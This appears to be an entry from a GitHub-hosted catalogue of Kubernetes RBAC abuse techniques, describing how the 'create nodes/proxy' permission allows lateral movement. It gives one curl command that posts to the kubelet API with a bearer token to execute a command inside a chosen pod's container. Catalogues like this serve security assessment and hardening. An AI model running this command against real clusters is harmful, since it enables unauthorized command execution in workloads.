can-i gtfo?

Kubernetes RBAC Abuse Collection

View on GitHub

create nodes/proxy

Abuses

Lateral Movement

Execute commands in a pod

curl -k -H "Authorization: Bearer TOKEN" -XPOST https://{IP}:10250/run/NAMESPACE/POD/CONTAINER -d "cmd=whoami"